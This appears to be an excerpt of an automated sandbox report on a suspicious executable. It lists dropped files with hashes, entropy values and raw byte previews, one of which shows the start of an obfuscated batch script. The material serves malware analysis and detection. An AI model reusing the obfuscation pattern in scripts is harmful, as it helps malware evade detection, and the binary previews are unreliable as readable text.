                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):273971
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999316760386263
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:6144:U4AyLxh/qeIF4xk08pIehmr0jZlEy5Euq1d+0JO8vr2eUpWcZcV5TeU:UFyLLqH4e3bll5EBf+qOa2Pl45V
                                                                                                                                                                                                                                                                                  MD5:0C7D5F0DB7D1BE49FC2285C64D3C45AA
                                                                                                                                                                                                                                                                                  SHA1:942803613A17B0735F80D32DAB9BE6B87A0E472F
                                                                                                                                                                                                                                                                                  SHA-256:D49D834CB452343C64C7B9716F5B6D6032CE8B81E04995CCD1AF130FF863143D
                                                                                                                                                                                                                                                                                  SHA-512:52C3CACDD5A798243BDF191D0F673C63BEFD5297284E2841DE8EF0588B103B1192E60D50E22E5572FA160834BE7D052AA328556ED182A1CC56C9BE55AB76CCC8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:Vz.5..Ff._);.S...jK.;.E......5...mv...%*.F.a..R-A..bv"g'5.3..b.e.$...[$D!..>..uT.j.....NY.K.p...ig.O@=..U_r.R......W.~/|......R.&.s...A-.y..d.....p...8T....$..b.k......gT...*..2.."f...0...T../..0,..#X.1.j...W.%)@\....3.B|........m.0...V7.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R}...N.8.'.F...h..............R.."...R.."..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..t. ..,P..Myn.2..t.W............<..R.......R.."..m.....8..r..5...x..2).U.j....R>..#.~.....b(..|......\.....k.LX....=.#=.....a.'....-??!?..H.`u.......f...g...I..Wz .......7.Pr..+.Q~..S.e.w..@...tj...)...=.6`)PP;v,8.lA_>y.m.......a....C.........c{...9,....=Ip....6..d.g...c8.XCloB.....U.M.|......od.8...|..0k.&Tc.
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.998259787787389
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:1536:k9iLtvCFjxENuqEuyf18I+F8tR2LiIXZYB+X6M4jw8oLynlk6iGTST/eeNhwCl:5tKtxE5Euyf1d+F8L2vXZYBO4Hc0r2TF
                                                                                                                                                                                                                                                                                  MD5:5535AA11BB8A32622DADB4CB7D45071C
                                                                                                                                                                                                                                                                                  SHA1:76B4B6221174F1B11370D7AA2A89A5996624C7F8
                                                                                                                                                                                                                                                                                  SHA-256:EAD59F9D65F7830E35A9C213B07938B7BC57513692ECBCF66B4BE4AC82350EBA
                                                                                                                                                                                                                                                                                  SHA-512:B14A53EA33B6F44EF4FFFB76060955F9AE85BFED79CA206359FFCDF80AA33D21ABFF41D526E43BA55BC33048FD8A237A2C854E92856F292CB4825304ACFBE3BD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:..YcDf.5...^f......e>:......!...s.d..2.j...i.b..=.Y.z......0...H..j.oW2...rj.srN...7.V..0..?.hSW...wl.q....V..}`T.q.u[.NV5I....r.a"...FK'.@W.._..zh>.x..d..R....p..../.Nd.....f8.F.....2pI.hm......x*.;..:......../,.@?......2..~..I@.+j.S....X..ku..............t....Mq..+zB....HY..".B]....*..8...!C.)`.....AZ5p.....z.J..>..q..;...v.a.........._R.P...F..i.L....+.r|@>K.9..y...+..n....{...g...5.m.....59..c.Y!.0.n.'..M[....?.s#..h.N.......`.[.A......:.s..~..:g=..(NcI.......u/Z.C...I.A.^..Fw.D}....+..@.C78....F....t..c.c.,xUl.....b..j}.Hj4..~..&q=%~......9."dR..q..6,t....^._a6.xM.%...3...%.p.-..81.j(............H-....D..~:-.M...Cq. .t...9.6Rx...%_30...L..........6.x\D..@9`..)..\...P..z^p..I.V.M0.y......(.7.....k.....h.....+.j.&.8.....B)..b..O/r..7....%.M..J.C..".UDk.I.... 3...dT;.n...=m.0F.R.....r..wn....`...d.Tn.}........T.5.#........d<T....Y...i......bQ. .|\n5x...\Q...#y.K..._.(.{.!_...7{.TXzJ....x|...XF<L..@H.....g.-...<..."M.....1.........Aj.
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (798), with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):17809
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.131067698498597
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:epq5NAPPiFt6JXCvH2/gFl3eF2OEgV9Qqnx:epfPPCt6JXgjlmck/x
                                                                                                                                                                                                                                                                                  MD5:15687A16A1310BB6DFCB1FB9B8D052B3
                                                                                                                                                                                                                                                                                  SHA1:BDA139691A5C3F90F7059D84DBAD98354748832F
                                                                                                                                                                                                                                                                                  SHA-256:08F36DA3D5E25C26D14E49BC46995AA1A5842AD368A9E02244DB850F77D4A70F
                                                                                                                                                                                                                                                                                  SHA-512:9DFAFA0CF6E7A54037CC53C155C7214580A90B4066D3B469A966F53D363AE63A6A4D9BB08A8DE64796E8C6B36E6A5E8374069952628A81B13EBFE93ABBC51574
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:Set Deviant=I..XbxCooling-Monthly-Records-Furnishings-Consolidation-Represents-Tribal-Bumper-Pill-..DJiTransexuales-Supported-Jonathan-Deadly-Rel-Mistress-Later-Scientists-Salary-..anLanguage-French-Kansas-Tuner-Drunk-..DcRespect-Morning-Words-..nZAcquired-Schools-Mere-Harley-Penalties-Spider-Profile-..LKQxSent-Permission-Ag-Rapids-..cNRatios-Emotions-..DDGTim-Describe-..Set Favour=S..paDollars-Bull-Ghana-Background-Researcher-Accreditation-Norway-..zhTexas-Allowing-Uzbekistan-Toolbox-Nv-Asus-Plots-Golf-..kUHelmet-Broker-Warcraft-Accurately-Ol-Competing-Ugly-..aWRoutes-U-Exploring-Diff-Airfare-Budget-Defense-..iPCArtwork-Proven-Film-Features-Wit-Lets-..Set Speaks=y..ZeMattress-Drug-..aiHChallenging-Bank-Hospitality-Mystery-Tony-Affair-Elementary-..WPSFrank-Opinion-Eugene-Puzzles-Future-..uLCorn-Metadata-Sheriff-Austria-Division-Second-After-Finite-South-..FmLatino-Launches-Kidney-Hazard-Congressional-..naZnImplementation-Presents-Lowest-..Set Centered=X..ffPContained-..vChSuit-Graduate
                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (798), with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):17809
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.131067698498597
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:epq5NAPPiFt6JXCvH2/gFl3eF2OEgV9Qqnx:epfPPCt6JXgjlmck/x
                                                                                                                                                                                                                                                                                  MD5:15687A16A1310BB6DFCB1FB9B8D052B3
                                                                                                                                                                                                                                                                                  SHA1:BDA139691A5C3F90F7059D84DBAD98354748832F
                                                                                                                                                                                                                                                                                  SHA-256:08F36DA3D5E25C26D14E49BC46995AA1A5842AD368A9E02244DB850F77D4A70F
                                                                                                                                                                                                                                                                                  SHA-512:9DFAFA0CF6E7A54037CC53C155C7214580A90B4066D3B469A966F53D363AE63A6A4D9BB08A8DE64796E8C6B36E6A5E8374069952628A81B13EBFE93ABBC51574
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:Set Deviant=I..XbxCooling-Monthly-Records-Furnishings-Consolidation-Represents-Tribal-Bumper-Pill-..DJiTransexuales-Supported-Jonathan-Deadly-Rel-Mistress-Later-Scientists-Salary-..anLanguage-French-Kansas-Tuner-Drunk-..DcRespect-Morning-Words-..nZAcquired-Schools-Mere-Harley-Penalties-Spider-Profile-..LKQxSent-Permission-Ag-Rapids-..cNRatios-Emotions-..DDGTim-Describe-..Set Favour=S..paDollars-Bull-Ghana-Background-Researcher-Accreditation-Norway-..zhTexas-Allowing-Uzbekistan-Toolbox-Nv-Asus-Plots-Golf-..kUHelmet-Broker-Warcraft-Accurately-Ol-Competing-Ugly-..aWRoutes-U-Exploring-Diff-Airfare-Budget-Defense-..iPCArtwork-Proven-Film-Features-Wit-Lets-..Set Speaks=y..ZeMattress-Drug-..aiHChallenging-Bank-Hospitality-Mystery-Tony-Affair-Elementary-..WPSFrank-Opinion-Eugene-Puzzles-Future-..uLCorn-Metadata-Sheriff-Austria-Division-Second-After-Finite-South-..FmLatino-Launches-Kidney-Hazard-Congressional-..naZnImplementation-Presents-Lowest-..Set Centered=X..ffPContained-..vChSuit-Graduate
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):105472
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.627402952919146
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:H80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSB9:cSCOMVIPPL/sZ7HS3zw
                                                                                                                                                                                                                                                                                  MD5:8496CEF888EE804F2B8A44171481E40A
                                                                                                                                                                                                                                                                                  SHA1:90FCDE8C353D79AE02BFC946D708D35FEDFEA64F
                                                                                                                                                                                                                                                                                  SHA-256:0D8671285841832D972CA2576CDB83F412AF8433CF33C511F652912E7FD7E29B
                                                                                                                                                                                                                                                                                  SHA-512:158C70A8804E73DFB25A1265328FADC26903C5B035A991AAA570F0EF98F89D616C635E4820E926FB8E00E1C20CFCF3FD441DCC0CA5EEFA109DD5BC23E0E4C61D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.....8.u..N...9..j.Pj(.6.~..=..I..E...E........u.............h.....u...^.b...PQWj..............}.....................f.}.....u..u.Wt.j..0j............t%j..7..\.I....u..u.W.....t.j...j......E.f.M............}.........u.f....u.Wt.j...j..S....E......w..QH..3.@......E.PV..4.I..E.P....I..E.PV..x.I..E.;E.......;E........E.;E.......;E.~............;...................u....{...j.j.SPW.....N........P.......Pj.j.W....I.SW.%....V...<..........E......j.VWS....I..E.QQ...E..]..E..\$....E..]..E...$.0VWS....I.VWS....I.S....I..U..M.E..j.X.E....E..E....*....E.j.X.u..E....E....E.S.U..M......u.j..u..u.S......M....P.E.....PVWS....I......E.j.X.u..E....E....E.S.U..M..4....u.j..u..u.S.....M....P.E........M.A...+.P.A...+.PVWS....I..<...t+H...t..u......c....}..^.......P....E...G....u.VWS....I..U..M..0....E.9..)M...1...95.)M........ ...P....I..%.)M.......V....I...S............xH.......V.u.h8....]...t..T)M...................V.u.h4....6...t(.T)M............<...h...<...`.......X...V.u.h3....u...x.I
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):116736
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.265669967004004
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:t/Dde6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbX:t/Dd314V14ZgP0JaAOz04pd
                                                                                                                                                                                                                                                                                  MD5:37F28BCCBCAEA4719409C72AA6385586
                                                                                                                                                                                                                                                                                  SHA1:083AD006B92745C976989BC5FB76E7187D81A597
                                                                                                                                                                                                                                                                                  SHA-256:7101D14A5FCF7B47A9C6B809155BEA70121C61D2DF7E2244573204C2190CCF45
                                                                                                                                                                                                                                                                                  SHA-512:105DE3A0358C0E95B573DD1FC590B27C33F8033158B28A523A5EF9BDBFAA1F488E6B0F7556D6E46D96E23F00392F4EEBDED0DCEA31926A05823EA1B5D4FFF22F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.L.R.u..;...}......u.2..9.E.f9.t..5H.I.PShC...Q..SShN....7..9..(M.u......f........_^[].(.U..Q.}..SVWu<.}..u...................I..............F.........u{2._^[.....E.P.E.P.u......t.M..@)M..}.......T)M............<.t.<.t.<.t.<.t..y..u.....I..u..F........T)M.......F..A..~..t..........y...U..E(...SV...W;.u.j.X.....P.^M...U,......;.u...E ;.u.......M$;.u.j.Yj.Q.u.QP.u..u.Sj.h`.L.R.u...:...u.....u.2..@.M..U...........j.P...YY.E.Pj.h.....6..H.I..=.(M..u.f........_^[..(.U..E(...u....0.SV.....t...........P.L.....E,...u.......M ...u.......U$...u......3.CSQ.u.RQ.u..u.V.u.hT.I.P.u..:9...u.....u.2..(P..l.I.PPh.....6..H.I..=.(M..u.f........^[].(.U..E(@..S..#E(V.....P..K...M,...U A....#M,...u.......E$...u......3.CSQ.u.PR.u..u.V.u.h,.L.Q.u..8...u.....u.2...j.....I..FL.=.(M..u.f........^[].(.U..E(SVW...u...........P.dK...M,.] A....#M,...u.j [.}$...u.j _3.RQ.u.RR.u..u.PRh..I.Q.u...8...u.....tTf......3.}.f......3.Cf9.tt.E....f........E.f.......E0P.Q......WV..L......u.Q..<.I.2.M0...._^
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):128000
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.334318948869726
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:UZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWfu:UK5vPeDkjGgQaE/loUDtfu
                                                                                                                                                                                                                                                                                  MD5:3B84985152CD93F2BD04BD909D7C902E
                                                                                                                                                                                                                                                                                  SHA1:4BD3D6AF1E4ED7EFE357E707EC7E6AB2E3FF4EEE
                                                                                                                                                                                                                                                                                  SHA-256:9DF8E69068B9CE01749FE0A515DB1554C05D491C3A5A4F80F8ABA060EA89950F
                                                                                                                                                                                                                                                                                  SHA-512:051D3B9FA3D463D78D1AC971396DCB00D930A9E9C3F7A1278A7DD8027D1AB159F688F912D65D78ADA9F059D73526F987A36CAC0D5100CAE5491959DD059F89DD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):90112
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.669251844476311
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:zzGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+q:v5mjccBiqXvpgF4qv+32eOyKODOSpQq
                                                                                                                                                                                                                                                                                  MD5:3EFE58B3BE584C2AFE3D64A453F70DAC
                                                                                                                                                                                                                                                                                  SHA1:BA151BDFA43145DC0E3A495AC5382638CFB0A2C1
                                                                                                                                                                                                                                                                                  SHA-256:7054A53CE5187D3470517170AF3138DC28CEC4ED1793574A91CCA795FB7E3E10
                                                                                                                                                                                                                                                                                  SHA-512:929B0A9AF43360AF0F820FAB936650B211978523B9FDEF00EE563930E03F2A9830E5C2246BE9ACE7F95AB78CFB075E82347CAFB02472B8A09DC4859C9A5232F3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:..0.]..B....t...........B.......It.........U.R.Na....RP.U..B ...t....u...$XZ.]..]...U...u..A...Y].U.....u...P..Y..t..u......Y..t.].}....h....F...U..]...........`K..U....L....j Y+.E...3...L.].U..E.V.H<....A..Q.....A.k.(..;.t..M.;J.r..B..B.;.r...(;.u.3.^]....V......t d........M..P...;.t.3.........u.2.^..^.U..}..u.....M.........-....u.2.]..?$....u.j...-..Y...].U.....=..M..t.....V.u...t....u}.$.....t&..u"h..M.."..Y..u.h..M.."..Y..tF2..K...L..u.W......M.j Y+.....3...L..E.E..E.......M..E.E..u.E...._....M....^..j......j.h..L......e...MZ..f9...@.u].<.@.....@.PE..uL.....f9...@.u>.E....@.+.PQ.^...YY..t'.x$.|!.E..........E..3.8..........e..E.....2..M.d......Y_^[..U.........t..}..u.3....M...].U..=..M..t..}..u..u..."...u..[,..YY..].U....L...3...M.....u.....u...!....h..M..l!..Y..Y....#E.].U...u.......Y....H].U...u..Q...Y].."...j......Y..t.hL.B......Y3..j..S....U..j.h3'D.d.....PSVW...L.3.P.E.d.....h....h..M...8.I.h..J.....I.....u.h,.J.....I...........hH.J.V....I.hd.J.V.....
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):71680
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.997482190075013
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:1536:UzkS9wznOULQYQQ1YvdhCPF6+XoWW/ej/q57UJZNt+59uxkfQFaxT7k:UzkS9wzNLQYhNvlW/ej/q5oJR69uxk0Z
                                                                                                                                                                                                                                                                                  MD5:F5C4EA189E763C79767BB2F4BC471F08
                                                                                                                                                                                                                                                                                  SHA1:6ABE10F27AEB64CB3583EC3549D8F84EB23B05EB
                                                                                                                                                                                                                                                                                  SHA-256:49B1A81A6965071DB23FE804A6293B87FD2AB96CFDA6E28D806C1E76A53E723E
                                                                                                                                                                                                                                                                                  SHA-512:31E79F7A7FC0A5EEA3C4D70B152F75573C43C324B317667F41A824EBB2913D7BF4BACBF08A85D6281EC33ADA2F2BABE2A26D251008288CB6A4CE85E38DBE51D7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:Vz.5..Ff._);.S...jK.;.E......5...mv...%*.F.a..R-A..bv"g'5.3..b.e.$...[$D!..>..uT.j.....NY.K.p...ig.O@=..U_r.R......W.~/|......R.&.s...A-.y..d.....p...8T....$..b.k......gT...*..2.."f...0...T../..0,..#X.1.j...W.%)@\....3.B|........m.0...V7.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R}...N.8.'.F...h..............R.."...R.."..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..t. ..,P..Myn.2..t.W............<..R.......R.."..m.....8..r..5...x..2).U.j....R>..#.~.....b(..|......\.....k.LX....=.#=.....a.'....-??!?..H.`u.......f...g...I..Wz .......7.Pr..+.Q~..S.e.w..@...tj...)...=.6`)PP;v,8.lA_>y.m.......a....C.........c{...9,....=Ip....6..d.g...c8.XCloB.....U.M.|......od.8...|..0k.&Tc.
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):239
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.917953550006691
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:ox3FqjvVg3F+X32+hZCt7HSbYwClS6CSNN:63FyGSG+fCtJfjN
                                                                                                                                                                                                                                                                                  MD5:28A97FEBFC5CD391BEC1E2A3D9D938BF
                                                                                                                                                                                                                                                                                  SHA1:ADEA302B1D73D65C4C2A64F4F10955D5E4D728AA
                                                                                                                                                                                                                                                                                  SHA-256:2528CD8D1353E6C4DBCC6D2226B5B50EF14027A962A49C4001D2C8C072904773
                                                                                                                                                                                                                                                                                  SHA-512:7BBB7F7781C77740EFC6361C5195A01F854C3CA1AFD9EC7870C4F87C5A28432AF97D61A41E4AF0D2D3CEA45FA3565E297FC08CD7ACA91831792DF0A81EFE0F82
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:profiles........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):64512
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7517361763863475
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:+Oa3HwwuBcozc/mwftIQXoSpu88888888888888888888888888888zv888888NR:TaAwuXc/mex/Sg
                                                                                                                                                                                                                                                                                  MD5:7BBDCF2829F157F4178AD1A4EA31BFE6
                                                                                                                                                                                                                                                                                  SHA1:AFC7C5852F104D94FC2726B3230039B696F17FC2
                                                                                                                                                                                                                                                                                  SHA-256:BAC794EE8129A6EDAA06FED424A8839D24B6B8E6A75C4F23BC8C3E7735498818
                                                                                                                                                                                                                                                                                  SHA-512:D2DD73E8F2B965B9BF9BB806C639AF654646D76628E5C707F29EDE16A1634DD5A699FB239C83C4BCF492B03E2941129AFFC777C39B9851F948A96F537DC844FF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.".......".......".......".......4.......'.......'.......'.......'.......'.......'...............................................Z.......Z.......Z.......Z.......Z.......Z.......Z...............=.......=.......=.......=.......=.......=.......K.......K.......K.......K.......\.......\.......\.......\.......E.......E.......E.......E.......E.......H.......H.......H.......H.......K.......................................!.......!.......!..?....!..?....!..?....!...A.......................J.......V.......d...............p.......~......................................................................................................................................C....!..GA...!..K....!.......!.......!.......!.......!...................................0...........!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......................................................:.......:.......:.......:......................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):68465
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.005168590448056
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:uu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:u4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                                                                                                                                  MD5:53AB895BB726A4933DD1DC3F2FA2E5F8
                                                                                                                                                                                                                                                                                  SHA1:3933C015286DE1871305AC17679D7244E0C73A07
                                                                                                                                                                                                                                                                                  SHA-256:230C6C15BB57BCB9566D03A0940EB2D8CBB52FD2807CB195982C2541EF7EBBC2
                                                                                                                                                                                                                                                                                  SHA-512:3FFB82FB40E8FF1D98D395601DE10BEB59AF9F77AF6300DBA79E2436EA787EE7DCE026DD43CDDA324515F81EC7B5F48E1DF396CFC3568128468C3CC5E663682B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.".#"=.v......;aoG..{.i.l?#...<4.a0.k.&....CK..v..........io.w.......W$....d.O..%...G.........l...`qq..;....w.....x..L7..G.1...=].....vd..\Xq.:Uu...... "m@.....9.w....]..J.....bawS~.[]W`n......-..p?.>.H. ...l.J..i.E....v..kk....~..m......+.8uy..w.i...Gw6...P..e'..H.i.....8...].....V.....9.............|..8.zc.kSY.=..T....'..l.qc:.|..q.f.U..m;.t..[g...:.'"..Mrlw...~.....MR.X.,.q..,y.....7....Ns`g....(U.....<....P...=.8.[.....2.V.<.....:/..bb..z*.+.....[.NT..... .vg.KG.]f.l..9..t....y1ZZZ|"..{L.yPG..Z..m.r|o7C.qW.cm..+.\.[..w.[....&.]=.....rlw..6;.T,...G..".....3T5 "}...T.X*l`Y./......OV][..`,[.9....FT.Vg3.vq....wD.orhg..C..:.l...........>U...e.T...V.......(Rm....sW.c1...N09....=.-...gx......IDZ........0..Z...q2U.,+`.....z.......H.Z...~.;.....^..oNpi|.$\*[|..$7g./.......Z...p.lQXw..........y..\w-.w.M.....K...w.....g..|...'..+......%X,[.:...... ..=.+.e.#.Nc.'.}...W...c......n..+.l....b...vw..;.t.Q..J.S.a.@.P.>......E........~:\nr..y..
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):118784
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.610127089636133
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:ywS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLtA:yb2j6AUkB0CThp6vmVnjpA
                                                                                                                                                                                                                                                                                  MD5:3B125D59CE5A2CF242A621511A0FB164
                                                                                                                                                                                                                                                                                  SHA1:3CCBA09F214B941931D6169CA9959ACE2A72ABA7
                                                                                                                                                                                                                                                                                  SHA-256:E4C1FBEDC713173BCEF5C724F3D64283ADD852A64F65C87EB3EC8D86C55833AA
                                                                                                                                                                                                                                                                                  SHA-512:C026F9AA8E83F2C888E2B8336C7EC8380D34873956407E32FAE31FD72BDA741B72C649B7162587435E3D13B9B9FAE8E0552330D710831C774264724C8589F36C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:xs.]..C<.M.;..t..4......V.M..t....M..i8....u=...y..A..~=.@<.M.;..t..4.....V.M..A....M..68....u..E.C;.|....u.V...YY.M..4.......2._^[....V...N..V..F......t.Q......F..V..$..^.U..V.u.j......Y.M.Qj.VP.....p..0.......^].3..A.f.A..u......U..U.;.t".....B..A..B..A..B..A..B..A..B..A...]....A .......9.|......S....A .......9A.|..A....:...U.......3.V.u.W....f.F.9G ............P....I.....R........8E.t.8.....u.....u....8E.u.....u..F..8.....u.....u..F..8.....u.....u..F..8.[....................F.......Sh........I.....I......f..u.h..........f..t.....u....h........I......f..u.h..........f..t.....u..F..j.....I......f..u.j.......f..t.....u..F..j.....I......f..u.j.......f..t.....u..F..j[....I......f..u.j[......f..t.....u..F..[_..^....U..QQS..3.V..E.W.x.CO.&..e....xPW.....j0Y...f;.r...9w.+.....Ar...Fw...7....ar%..fw ..W........O.E.@.E.....E.|....t..&.2....._^[..y..........<.......<-......<.......<#......<(t.<"t{<%tw<'ts<$to<&tk<!tg<otc<]t_<[t[<\tW<.tS<.tO<_tK<.tG<.tC<.t?<.t;<.t7<.t3<.t/<.t+<.
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\9EI7wrGs4K.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):62464
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.996893383300018
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:1536:BUSTLYdN5/qM8GDI99k/fG3EwYkRinZI6I6+bit:u+L8H/pmk20DnZI6m2
                                                                                                                                                                                                                                                                                  MD5:D947E72346C4AC1ABA8BBDE8BB791F6F
                                                                                                                                                                                                                                                                                  SHA1:F6DC2CFFBC0B29502CBA42D9ADEE2263A7FF4835
                                                                                                                                                                                                                                                                                  SHA-256:A6E6FC90D3C04E2461E3017E9F1DBAA27ABB9278F5DB7BB09A218A3A969FEB41
